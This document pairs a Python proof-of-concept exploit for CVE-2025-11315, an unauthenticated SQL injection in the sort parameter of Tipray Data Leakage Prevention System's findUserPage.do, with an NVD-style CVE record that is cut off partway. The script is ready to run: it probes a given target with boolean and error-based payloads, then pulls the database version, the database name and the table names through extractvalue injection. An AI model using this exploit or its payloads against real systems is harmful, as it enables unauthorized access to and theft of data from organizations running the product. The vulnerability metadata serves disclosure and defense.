CVE-2025-11315

# CVE-2025-11315 - Tipray Data Leakage Prevention System SQL Injection PoC # Vulnerability: SQL Injection via sort parameter in findUserPage.do # Author: Security Researcher import requests import sys TARGET_URL = "http://target-host:port" VULNERABLE_ENDPOINT = "/findUserPage.do" def exploit_sqli(target_url, sort_payload): """ Exploit SQL injection in the sort parameter of findUserPage function. The sort parameter is directly concatenated into SQL query without sanitization. """ url = target_url + VULNERABLE_ENDPOINT # Construct malicious sort parameter with SQL injection payload # Using ORDER BY injection technique via sort parameter params = { "sort": sort_payload, "page": "1", "rows": "10" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded" } try: response = requests.get(url, params=params, headers=headers, timeout=10) return response except requests.exceptions.RequestException as e: print(f"[ERROR] Request failed: {e}") return None def detect_injection(target_url): """Detect if the target is vulnerable to SQL injection""" # Test payloads for ORDER BY based SQL injection payloads = [ "id", # Normal request "id ASC", # Normal sort "id AND 1=1", # Boolean true test "id AND 1=2", # Boolean false test "id,(SELECT 1)", # Error-based detection "id AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)", # Extract database name ] for payload in payloads: print(f"[*] Testing payload: {payload[:50]}...") response = exploit_sqli(target_url, payload) if response and ("Duplicate entry" in response.text or "error" in response.text.lower()): print(f"[+] Target is vulnerable! Database info may be leaked.") print(response.text[:500]) return True return False def extract_data(target_url): """Extract sensitive data from the database""" # Error-based injection to extract database version payload = "id AND extractvalue(1,concat(0x7e,(SELECT version()),0x7e))" response = exploit_sqli(target_url, payload) if response: print(f"[+] Database version info:") print(response.text) # Extract current database name payload = "id AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))" response = exploit_sqli(target_url, payload) if response: print(f"[+] Current database:") print(response.text) # Extract table names payload = "id AND extractvalue(1,concat(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()),0x7e))" response = exploit_sqli(target_url, payload) if response: print(f"[+] Table names:") print(response.text) if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_url>") print(f"Example: {sys.argv[0]} http://192.168.1.100:8080") sys.exit(1) target = sys.argv[1] print(f"[*] Target: {target}") print(f"[*] CVE-2025-11315 SQL Injection Exploit") print("-" * 50) if detect_injection(target): extract_data(target) else: print("[-] Target may not be vulnerable or payload needs adjustment.")

{"cve": {"id": "CVE-2025-11315", "sourceIdentifier": "[email protected]", "published": "2025-10-06T02:15:39.910", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Tipray 厦门天锐科技股份有限公司 Data Leakage Prevention System 天锐数据泄露防护系统 1.0. Affected by this vulnerability is the function findUserPage of the file findUserPage.do. Performing manipulation of the argument sort results in sql injection. Remote exploitation of the attack is possible. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tipray:data_leakage_prevention_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "25FED908-237A-432E-9605-57E982321BD3"}]}]}], "references": [{"url": "https://github.com/FightingLzn9/vul/blob/main/%E5%A4%A9%E9%94%90%E6%95%B0%E6%8D%AE%E6%B3%84%E9%9C%B2%E9%98%B2%E6%8A%A4%E7%B3%BB%E7%BB%9F-7.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/FightingLzn9/vul/blob/main/%E5%A4%A9%E9%94%90%E6%95%B0%E6%8D%AE%E6%B3%84%E9%9C%B2%E9%98%B2%E6%8A%A4%E7%B3%BB%E7%BB%9F-7.md#3-proof-of-concept-poc", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://vuldb.com/?ctiid.327196", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327196", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.663494", "source": "[email protected]", " ... (truncated)